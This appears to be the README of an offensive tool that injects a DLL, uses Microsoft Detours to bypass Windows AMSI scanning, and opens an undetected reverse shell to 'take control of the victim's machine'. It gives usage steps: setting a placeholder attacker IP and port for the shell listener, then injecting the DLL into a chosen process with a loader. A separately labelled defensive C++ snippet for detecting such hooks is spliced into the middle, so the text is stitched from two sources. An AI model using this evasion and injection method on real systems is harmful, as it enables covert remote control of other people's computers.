AMSI-DLL-Injection

A crafted/AMSI-Bypassing DLL to inject for establishing a Reverse Shell using Microsoft Detours


A crafted/AMSI-Bypassing injectable DLL for establishing an undetected Reverse Shell using Microsoft Detours.

This artefact bypasses Microsoft's AMSI interface (the scanning layer used by Windows Defender) by using Microsoft Detours to intercept and hijack the function calls that emanate from it, so as to launch an undetectable reverse shell and take control of the victim's machine. This is obviously only a POC; the tool/method can be extended in countless ways.
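Because Detours installs a hook by overwriting the first instructions of the target function with a jump to the detour, a defender can tell a hooked AMSI export from an untouched one by inspecting its prologue. The following is an added example, not code from this repository: a portable checker that classifies the first bytes of an x64 function (which you would read from the target process; the sample prologues and the module base/size here are constructed) and flags a jump that leaves the exporting module's image.

```cpp
#include <cstdint>
#include <cstdio>
#include <cstring>
#include <vector>

using Bytes = std::vector<uint8_t>;

// What the first instructions of a function look like.
enum class Prologue { Clean, JmpRel32, JmpIndirect, MovRaxJmpRax };

// Detours redirects a function by overwriting its entry with a jump to the
// detour, so a hooked export no longer begins with its original instructions.
Prologue classify_prologue(const Bytes& b) {
    if (b.size() >= 5 && b[0] == 0xE9)                   // JMP rel32
        return Prologue::JmpRel32;
    if (b.size() >= 6 && b[0] == 0xFF && b[1] == 0x25)   // JMP QWORD PTR [rip+disp32]
        return Prologue::JmpIndirect;
    if (b.size() >= 12 && b[0] == 0x48 && b[1] == 0xB8   // MOV RAX, imm64
        && b[10] == 0xFF && b[11] == 0xE0)                // JMP RAX
        return Prologue::MovRaxJmpRax;
    return Prologue::Clean;
}

bool looks_hooked(const Bytes& b) { return classify_prologue(b) != Prologue::Clean; }

// Destination of a JMP rel32 located at func_addr (target = next ip + rel32).
uint64_t jmp_rel32_target(uint64_t func_addr, const Bytes& b) {
    int32_t rel;
    std::memcpy(&rel, &b[1], sizeof rel);  // little-endian signed displacement
    return func_addr + 5 + static_cast<int64_t>(rel);
}

// A jump that lands outside the image of the module exporting the function
// (e.g. into an injected DLL) is the strongest indicator of an external hook.
bool jump_leaves_module(uint64_t func_addr, const Bytes& b,
                        uint64_t mod_base, uint64_t mod_size) {
    uint64_t t = jmp_rel32_target(func_addr, b);
    return t < mod_base || t >= mod_base + mod_size;
}

// Constructed sample prologues; not captured from a real amsi.dll.
const Bytes kCleanPrologue = {0x48,0x89,0x5C,0x24,0x08, 0x48,0x89,0x6C,0x24,0x10};
const Bytes kDetoursStyle  = {0xE9,0x10,0x20,0x30,0x40, 0xCC,0xCC,0xCC};

int main() {
    // Assumed (constructed) function address and module image range.
    const uint64_t func = 0x7FF800001000ULL, base = 0x7FF800000000ULL, size = 0x100000ULL;
    std::printf("clean prologue hooked: %d\n", looks_hooked(kCleanPrologue));
    std::printf("detours-style hooked: %d, leaves module: %d\n", looks_hooked(kDetoursStyle),
                jump_leaves_module(func, kDetoursStyle, base, size));
    return 0;
}
```

In a real scan the prologue bytes come from reading the export's address in the inspected process, and the module range from its loaded-module list; comparing against the on-disk copy of amsi.dll catches hooks this simple byte check would miss.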

Usage:

In CustomDLL.cpp, set the listener address:

    ip = (char*)"<YOUR_IP_ADDRESS>"; // REPLACE WITH YOUR IP ADDRESS
    port = 0000;                     // TCP PORT YOU'RE LISTENING ON

Then inject the compiled DLL into the target process:

    Loader.exe <PID> <PATH_TO_CUSTOM_DLL>

Injection on notepad.exe & reverse shell (screenshots):

Normal scenario:

DLL injection & AMSI bypassing through Detours:

Crafted module loaded among the others:

References:
Understanding and bypassing AMSI
OverviewInterception
Microsoft Detours Package
NTDLL Unhooked Reverse Shell